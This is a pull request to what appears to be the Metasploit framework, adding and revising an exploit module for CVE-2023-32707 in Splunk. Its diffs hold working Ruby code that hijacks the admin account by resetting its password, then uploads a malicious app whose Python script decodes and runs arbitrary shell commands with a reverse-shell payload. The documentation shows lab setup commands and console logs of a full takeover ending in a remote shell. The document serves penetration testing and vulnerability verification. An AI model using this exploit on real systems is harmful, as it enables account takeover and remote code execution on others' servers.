### PR TITLE
Splunk account take over (CVE-2023-32707) leading to RCE

### DIFF
--- a/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
+++ b/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
@@ -20,7 +20,7 @@ Splunk Cloud Platform:
 ### Exploitation
 
 This module exploits this authorization issue to take over the admin account (or any other account with
-the capability 'install_apps') to deploy an app within Splunk, aiming to achieve remote code execution.
+the capability `install_apps`) to deploy an app within Splunk, aiming to achieve remote code execution.
 
 To achieve that this module:
 - Will change the password of the targeted user;
@@ -34,7 +34,7 @@ After the execution the cleanup method will be called and:
 Create a Splunk's docker container with the following command:
 
 ```bash
-docker run -d -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
+    docker run -d -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
 ```
 
 ```bash

--- a/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
+++ b/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
@@ -178,21 +178,23 @@ exit
 On a **non-vulnerable** version the module will fail as shown below:
 
 ```
-msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
 
-[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Started reverse TCP handler on 172.17.0.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable "set ForceExploit true" to override check result.
+[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
+[*] Changing 'admin' password to iDKBmVsj
+[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
 [*] Exploit completed, but no session was created.
-msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
-```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > set ForceExploit true
+ForceExploit => true
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit 
 
-```
-msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
-
-[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Started reverse TCP handler on 172.17.0.1:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable "set ForceExploit true" to override check result.
+[!] The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable ForceExploit is enabled, proceeding with exploitation.
+[*] Changing 'admin' password to scupUXtcV
+[-] Exploit aborted due to failure: unexpected-reply: Unable to change admin's password.
 [*] Exploit completed, but no session was created.
-msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > 
 ```

--- a/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
+++ b/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
@@ -44,8 +44,8 @@ Create a Splunk's docker container with the following command:
     $ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST
 ```
 
-:exclamation: One must log in at least once on the web interface (https://localhost:8000). Otherwise, this module will fail to get the CSRF
-token on the `appinstall`.
+**One must log in at least once on the web interface (http://localhost:8000). Otherwise, this module will fail to get the CSRF
+token on the `appinstall`.**
 
 ## Verification Steps
 Follow [Setup](#setup) and [Scenarios](#scenarios).

--- a/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
+++ b/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
@@ -1,0 +1,198 @@
+## Vulnerable Application
+
+### Description
+
+An authorization issue within Splunk Enterprise allows any user with the edit_user capability to take over
+the admin account (or any other chosen account) by simply changing its password.
+
+On June 1, 2023, Splunk released a software update that addressed this vulnerability (CVE-2023-32707).
+
+The following products are affected:
+
+Splunk Enterprise:
+ - from 8.1 before 8.1.14
+ - from 8.2 before 8.2.11
+ - from 9.0 before 9.0.5
+
+Splunk Cloud Platform:
+ - before 9.0.2303.100
+
+### Exploitation
+
+This module exploits this authorization issue to take over the admin account (or any other account with
+the capability 'install_apps') to deploy an app within Splunk, aiming to achieve remote code execution.
+
+To achieve that this module:
+- Will change the password of the targeted user;
+- Will deploy an app with a malicious payload;
+
+After the execution the cleanup method will be called and:
+- Should delete the deployed app;
+
+### Setup
+
+Create a Splunk's docker container with the following command:
+
+```bash
+docker run -d -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
+```
+
+```bash
+    # Creating non-admin user
+    $ curl -k -u admin:password https://localhost:8089/services/authentication/users -d name=redway -d password=changeme -d roles=user -d createrole=1 -X POST
+    # Adding capability to edit_user to the non-admin role
+    $ curl -k -u admin:password https://localhost:8089/services/authorization/roles/user-redway -d capabilities=edit_user -X POST
+```
+
+:exclamation: One must log in at least once on the web interface (https://localhost:8000). Otherwise, this module will fail to get the CSRF
+token on the `appinstall`.
+
+## Verification Steps
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Options
+
+### USERNAME (required)
+
+The username that with the capability `edit_user` to authenticate with.
+
+### PASSWORD (required)
+
+The password of the user to authenticate with.
+
+### RHOSTS (required)
+
+The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+
+### RPORT (required)
+
+The target port (TCP)
+
+### TARGET_USER (required)
+
+The username to change the password for (default: admin)
+
+### TARGET_PASSWORD
+
+The new password to set for the admin user (default: random)
+
+### APP_NAME
+
+The name of the app to upload (default: random)
+
+## Scenarios
+
+### Docker container running Splunk 9.0.4
+
+
+If the user you have access doen't have the capability `edit_user` the module will fail as shown below:
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > check
+
+[*] Splunk version 9.0.4 detected
+[*] 127.0.0.1:8000 - The target is not exploitable. User 'redway' does not have 'edit_user' capability
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+
+```
+
+If the targeted user does have the capability `install_apps` the module will fail as shown below:
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Splunk version 9.0.4 detected
+[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
+[*] Changing 'user' password to yMDIOKyrHoUx
+[+] Password of the user 'user' has bee changed to yMDIOKyrHoUx
+[-] Exploit aborted due to failure: bad-config: The user 'user' does not have 'install_app' capability. You may consider to target other user
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+```
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > options
+
+Module options (exploit/multi/http/splunk_privilege_escalation_cve_2023_32707):
+
+   Name             Current Setting      Required  Description
+   ----             ---------------      --------  -----------
+   APP_NAME                              no        The name of the app to upload (default: random)
+   PASSWORD         changeme             yes       The password for the specified username
+   Proxies          http:127.0.0.1:8080  no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS           127.0.0.1            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT            8000                 yes       The target port (TCP)
+   SSL              false                no        Negotiate SSL/TLS for outgoing connections
+   TARGET_PASSWORD                       no        The new password to set for the admin user (default: random)
+   TARGET_USER      admin                yes       The username to change the password for (default: admin)
+   USERNAME         redway               yes       The username with "edit_user" role to authenticate as
+   VHOST                                 no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_python):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.17.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+   SHELL  /bin/sh          yes       The system shell to use
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Splunk <= 9.0.5, 8.2.11, and 8.1.14 / Linux
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Splunk version 9.0.4 detected
+[+] The target appears to be vulnerable. User 'redway' has 'edit_user' capability
+[*] Changing 'admin' password to srviInIpi
+[+] Password of the user 'admin' has bee changed to srviInIpi
+[*] Uploading app stringtough
+[*] Uploading file stringtough
+[*] Creating an application package named: stringtough
+[+] stringtough successfully uploaded
+[*] Waiting for session
+[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.17.0.2:52672) at 2023-09-12 15:19:53 +0200
+
+id
+uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible)
+pwd
+/opt/splunk/etc/apps/stringtough/bin
+exit
+[*] 127.0.0.1 - Command shell session 1 closed.
+```
+
+### Docker container running Splunk 9.0.5
+
+On a **non-vulnerable** version the module will fail as shown below:
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+```
+
+```
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) > exploit
+
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. Detected Splunk version 9.0.5 which is not vulnerable "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(multi/http/splunk_privilege_escalation_cve_2023_32707) >
+```

--- a/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
+++ b/documentation/modules/exploit/multi/http/splunk_privilege_escalation_cve_2023_32707.md
@@ -34,7 +34,7 @@ After the execution the cleanup method will be called and:
 Create a Splunk's docker container with the following command:
 
 ```bash
-    docker run -d -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
+    docker run --rm -p 8000:8000 -p 8089:8089 -e "SPLUNK_START_ARGS=--accept-license" -e "SPLUNK_PASSWORD=password" --name splunk-9.0.4 splunk/splunk:9.0.4
 ```
 
 ```bash

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -48,7 +48,11 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Arch' => ARCH_CMD,
               'Platform' => %w[linux unix],
-              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python',
+                # just to avoid the error because of the clean up: 'error retrieving current directory: getcwd: cannot access parent directories:'
+                'AutoRunScript' => 'post/multi/general/execute COMMAND=cd $SPLUNK_HOME'
+               }
             }
           ],
           [
@@ -69,8 +73,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'Stability' => [CRASH_SAFE],
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => [
-            IOC_IN_LOGS,
-            ARTIFACTS_ON_DISK # app is uploaded
+            IOC_IN_LOGS, # requests are logged in the _audit index
+            # ARTIFACTS_ON_DISK # app is removed in the cleanup method
           ]
         },
         'DisclosureDate' => '2023-06-01'
@@ -83,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [true, 'The password for the specified username']),
         OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
         OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),
-        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-]/, '_')])
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-|_]/, '')])
       ]
     )
     # That depends on finding a strategy to distinguish commands that return output and commands that don't
@@ -138,28 +142,28 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # The cleanup method is removing the app before the session is closed and it is broking the session.
   #
-  # def cleanup
-  #   return unless session_created?
-  #   super
-  #   # Destroy job
-  #   vprint_status("Cleaning up: destroying job #{@job_id}")
-  #   send_request_cgi({
-  #     'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
-  #     'method' => 'DELETE',
-  #     'cookie' => cookie
-  #   })
-  #   # Remove app
-  #   vprint_status("Cleaning up: removing app #{app_name}")
-  #   execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
-  #   send_request_cgi({
-  #     'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
-  #     'method' => 'POST',
-  #     'cookie' => cookie,
-  #     'vars_post' => {
-  #       'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
-  #     }
-  #   })
-  # end
+  def cleanup
+    return unless session_created?
+    super
+    # Destroy job
+    vprint_status("Cleaning up: destroying job #{@job_id}")
+    send_request_cgi({
+      'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
+      'method' => 'DELETE',
+      'cookie' => cookie
+    })
+    # Remove app
+    vprint_status("Cleaning up: removing app #{app_name}")
+    execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
+    send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
+      'method' => 'POST',
+      'cookie' => cookie,
+      'vars_post' => {
+        'splunk_form_key' => cookies_hash['splunkweb_csrf_token_8000']
+      }
+    })
+  end
 
   def exploit
     splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
@@ -359,18 +363,19 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # bin folder
     msf_exec_py = <<~EOF
-      import os, sys, base64
+      import sys, base64, subprocess
       import splunk.Intersplunk
 
       header = ['result']
       results = []
 
       try:
-          output = os.popen(base64.b64decode(sys.argv[1]).decode()).read()
-          results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})
+        proc = subprocess.Popen(['/bin/bash', '-c', base64.b64decode(sys.argv[1]).decode()], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
+        output = proc.stdout.read().decode('utf-8')
+        results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})
       except Exception as e:
-          error_msg = f'Error : {str(e)} '
-          results = splunk.Intersplunk.generateErrorResults(error_msg)
+        error_msg = f'Error : {str(e)} '
+        results = splunk.Intersplunk.generateErrorResults(error_msg)
 
       splunk.Intersplunk.outputResults(results, fields=header)
     EOF

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -82,8 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [true, 'The username with "edit_user" role to authenticate as']),
         OptString.new('PASSWORD', [true, 'The password for the specified username']),
         OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
-        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)']),
-        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)'])
+        OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-]/, '_')])
       ]
     )
 
@@ -134,15 +134,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def app_name
-    @app_name ||= (datastore['APP_NAME'] || Faker::App.name).downcase.gsub(/\s/, '_')
+    datastore['APP_NAME']
   end
 
   # The cleanup method is removing the app before the session is closed and it is broking the session.
+  #
   # def cleanup
   #   return unless session_created?
-
   #   super
-
+  # Destroy job
+  # send_request_cgi({
+  #   'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
+  #   'method' => 'DELETE',
+  #   'cookie' => cookie
+  # })
+  # Remove app
   #   execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
   #   send_request_cgi({
   #     'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
@@ -155,18 +161,17 @@ class MetasploitModule < Msf::Exploit::Remote
   # end
 
   def exploit
-    @password = datastore['TARGET_PASSWORD'] || Rex::Text.rand_text_alpha(rand(8..12))
-
-    splunk_change_password(datastore['TARGET_USER'], @password)
-    splunk_login(datastore['TARGET_USER'], @password)
+    splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
+    splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
 
     splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE']) unless datastore['DisableUpload']
 
-    job_id = execute_command(payload.encoded, { app_name: app_name })
+    @job_id = execute_command(payload.encoded, { app_name: app_name })
+    # TODO: distinguish commands that return output and commands that don't
+    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output'
     if datastore['ReturnOutput']
       print_status('Waiting for command output')
-      print_line(spunk_fetch_job_output(app_name, job_id))
-    else
+      print_line(splunk_fetch_job_output)
     end
   end
 
@@ -186,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'status_buckets' => '300',
           'output_mode' => 'json',
           'search' => "|  #{app_name} #{Rex::Text.encode_base64(cmd)}",
-          'earliest_time' => '-24h@h',
+          'earliest_time' => '-1@h',
           'latest_time' => 'now',
           'ui_dispatch_app' => (opts[:app_name]).to_s
         }
@@ -196,7 +201,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     body = res.get_json_document
 
-    fail_with(Failure::UnexpectedReply, "Unable to execute command. Unexpected reply (HTTP #{res.code})") unless body['data']
+    fail_with(Failure::UnexpectedReply, 'Unable to get JOB ID of the command') unless body['data']
 
     body['data']
   end
@@ -279,45 +284,33 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Uploading file #{app_name}")
 
-    boundary = '-' * 29 + rand_text_numeric(30)
-    data = ''
+    data = Rex::MIME::Message.new
     # fill the hidden fields from the form: state and splunk_form_key
     html.at('[id="installform"]').elements.each do |form|
       next unless form.attributes['value']
 
-      data << "\r\n--#{boundary}\r\n"
-      data << "Content-Disposition: form-data; name=\"#{form.attributes['name']}\"\r\n\r\n"
-      data << form.attributes['value'].to_s
-      data << "\r\n--#{boundary}\r\n"
+      data.add_part(form.attributes['value'].to_s, nil, nil, "form-data; name=\"#{form.attributes['name']}\"")
     end
-
-    data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n"
-    data << '1'
-    data << "\r\n--#{boundary}\r\n"
-
-    data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"\r\n"
-    data << "Content-Type: application/gzip\r\n\r\n"
-    data << splunk_app
-    data << "\r\n--#{boundary}--\r\n"
+    data.add_part('1', nil, nil, 'form-data; name="force"')
+    data.add_part(splunk_app, 'application/gzip', 'binary', "form-data; name=\"appfile\"; filename=\"#{app_name}.tar.gz\"")
+    post_data = data.to_s
 
     res = send_request_cgi({
       'uri' => '/en-US/manager/appinstall/_upload',
       'method' => 'POST',
       'cookie' => cookie,
-      'ctype' => "multipart/form-data; boundary=#{boundary}",
-      'data' => data
+      'ctype' => "multipart/form-data; boundary=#{data.bound}",
+      'data' => post_data
     })
 
-    if (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
-      print_good("#{app_name} successfully uploaded")
-    else
-      fail_with(Failure::Unknown, 'Error uploading App')
-    end
+    fail_with(Failure::Unknown, 'Error uploading App') unless (res&.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/))
+
+    print_good("#{app_name} successfully uploaded")
   end
 
-  def splunk_fetch_job_output(app_name, job_id)
+  def splunk_fetch_job_output
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{job_id}/results"),
+      'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),
       'method' => 'GET',
       'keep_cookies' => true,
       'cookie' => cookie,
@@ -365,22 +358,17 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # bin folder
     msf_exec_py = <<~EOF
-      import sys
-      import base64
+      import os, sys, base64
       import splunk.Intersplunk
 
-      header = ["result"]
-
+      header = ['result']
       results = []
-      value_bytes = base64.b64decode(sys.argv[1])
-      try:
-          value_str = value_bytes.decode('utf-8')
-          output = sys.modules['os'].popen(value_str).read()
-          output_base64 = base64.b64encode(output.encode('utf-8')).decode('utf-8')
-          results.append({"result": output_base64})
 
+      try:
+          output = os.popen(base64.b64decode(sys.argv[1]).decode()).read()
+          results.append({'result': base64.b64encode(output.encode('utf-8')).decode('utf-8')})
       except Exception as e:
-          error_msg = "Error : " + str(e)
+          error_msg = f'Error : {str(e)} '
           results = splunk.Intersplunk.generateErrorResults(error_msg)
 
       splunk.Intersplunk.outputResults(results, fields=header)

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('PASSWORD', [true, 'The password for the specified username']),
         OptString.new('TARGET_USER', [true, 'The username to change the password for (default: admin)', 'admin']),
         OptString.new('TARGET_PASSWORD', [false, 'The new password to set for the admin user (default: random)', Rex::Text.rand_text_alpha(rand(8..12))]),
-        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-|_]/, '')])
+        OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/(\s|-|_){1,}/, '')])
       ]
     )
     # That depends on finding a strategy to distinguish commands that return output and commands that don't

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -86,13 +86,12 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('APP_NAME', [false, 'The name of the app to upload (default: random)', Faker::App.name.downcase.gsub(/[\s|-]/, '_')])
       ]
     )
-
-    register_advanced_options(
-      [
-        OptBool.new('ReturnOutput', [ true, 'Display command output', false ]),
-        OptBool.new('DisableUpload', [ true, 'Disable the app upload if you have already performed it once', false ])
-      ]
-    )
+    # That depends on finding a strategy to distinguish commands that return output and commands that don't
+    # register_advanced_options(
+    #   [
+    #     OptBool.new('ReturnOutput', [ true, 'Display command output', false ])
+    #   ]
+    # )
   end
 
   def check
@@ -107,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    return CheckCode::Detected('Could not detect the version.') unless res&.code == 200
+    return CheckCode::Unknown('Could not detect the version.') unless res&.code == 200
 
     body = res.get_json_document
     version = Rex::Version.new(body['generator']['version'])
@@ -118,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       version < Rex::Version.new('8.1.14')
     )
 
-    print_status("Splunk version #{version} detected")
+    print_status("Detected Splunk version #{version} which is vulnerable")
     capabilities = body['entry'].first['content']['capabilities']
 
     return CheckCode::Safe("User '#{datastore['USERNAME']}' does not have 'edit_user' capability") unless capabilities.include? 'edit_user'
@@ -130,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
       info: [version]
     )
 
-    CheckCode::Appears("User '#{datastore['USERNAME']}' has 'edit_user' capability")
+    CheckCode::Vulnerable("User '#{datastore['USERNAME']}' has 'edit_user' capability")
   end
 
   def app_name
@@ -142,13 +141,15 @@ class MetasploitModule < Msf::Exploit::Remote
   # def cleanup
   #   return unless session_created?
   #   super
-  # Destroy job
-  # send_request_cgi({
-  #   'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
-  #   'method' => 'DELETE',
-  #   'cookie' => cookie
-  # })
-  # Remove app
+  #   # Destroy job
+  #   vprint_status("Cleaning up: destroying job #{@job_id}")
+  #   send_request_cgi({
+  #     'uri' => normalize_uri('/en-US/splunkd/__raw/services/search/jobs/', job_id),
+  #     'method' => 'DELETE',
+  #     'cookie' => cookie
+  #   })
+  #   # Remove app
+  #   vprint_status("Cleaning up: removing app #{app_name}")
   #   execute_command("bash -c 'rm -rf $SPLUNK_HOME/etc/apps/#{app_name}'")
   #   send_request_cgi({
   #     'uri' => normalize_uri(target_uri.path, '/en-US/debug/refresh'),
@@ -164,15 +165,15 @@ class MetasploitModule < Msf::Exploit::Remote
     splunk_change_password(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
     splunk_login(datastore['TARGET_USER'], datastore['TARGET_PASSWORD'])
 
-    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE']) unless datastore['DisableUpload']
+    splunk_upload_app(app_name, datastore['SPLUNK_APP_FILE'])
 
     @job_id = execute_command(payload.encoded, { app_name: app_name })
     # TODO: distinguish commands that return output and commands that don't
-    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output'
-    if datastore['ReturnOutput']
-      print_status('Waiting for command output')
-      print_line(splunk_fetch_job_output)
-    end
+    # fail_with(Failure::ConfigError, 'The payload returns output. Consider to set ReturnOutput to true') if payload.encoded.include? 'return output' && !datastore['ReturnOutput']
+    # if datastore['ReturnOutput']
+    #   print_status('Waiting for command output')
+    #   print_line(splunk_fetch_job_output)
+    # end
   end
 
   def execute_command(cmd, opts = {})
@@ -263,7 +264,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     fail_with(Failure::UnexpectedReply, "Unable to change #{username}'s password.") unless res&.code == 200
 
-    print_good("Password of the user '#{username}' has bee changed to #{password}")
+    print_good("Password of the user '#{username}' has been changed to #{password}")
 
     body = res.get_json_document
     capabilities = body['entry'].first['content']['capabilities']
@@ -308,25 +309,25 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("#{app_name} successfully uploaded")
   end
 
-  def splunk_fetch_job_output
-    res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),
-      'method' => 'GET',
-      'keep_cookies' => true,
-      'cookie' => cookie,
-      'vars_get' => {
-        'output_mode' => 'json'
-      }
-    })
+  # def splunk_fetch_job_output
+  #   res = send_request_cgi({
+  #     'uri' => normalize_uri(target_uri.path, "/en-US/splunkd/__raw/servicesNS/#{datastore['TARGET_USER']}/#{app_name}/search/jobs/#{@job_id}/results"),
+  #     'method' => 'GET',
+  #     'keep_cookies' => true,
+  #     'cookie' => cookie,
+  #     'vars_get' => {
+  #       'output_mode' => 'json'
+  #     }
+  #   })
 
-    fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200
+  #   fail_with(Failure::UnexpectedReply, "Unable to get JOB results. Unexpected reply (HTTP #{res.code})") unless res&.code == 200
 
-    body = res.get_json_document
+  #   body = res.get_json_document
 
-    fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?
+  #   fail_with(Failure::UnexpectedReply, "Splunk reply: #{body['messages'].collect { |h| h['text'] if h['type'] == 'ERROR' }.join('\n')}") if body['results'].empty?
 
-    Rex::Text.decode_base64(body['results'].first['result'])
-  end
+  #   Rex::Text.decode_base64(body['results'].first['result'])
+  # end
 
   def splunk_app
     # metadata folder

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -116,9 +116,9 @@ class MetasploitModule < Msf::Exploit::Remote
     version = Rex::Version.new(body['generator']['version'])
 
     return CheckCode::Safe("Detected Splunk version #{version} which is not vulnerable") unless (
-      version < Rex::Version.new('9.0.5') ||
-      version < Rex::Version.new('8.2.11') ||
-      version < Rex::Version.new('8.1.14')
+      (Rex::Version.new('9.0.0') <= version && version < Rex::Version.new('9.0.5')) ||
+      (Rex::Version.new('8.2.0') <= version && version < Rex::Version.new('8.2.11')) ||
+      (Rex::Version.new('8.1.0') <= version && version < Rex::Version.new('8.1.14'))
     )
 
     print_status("Detected Splunk version #{version} which is vulnerable")

--- a/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
+++ b/modules/exploits/multi/http/splunk_privilege_escalation_cve_2023_32707.rb
@@ -1,0 +1,430 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
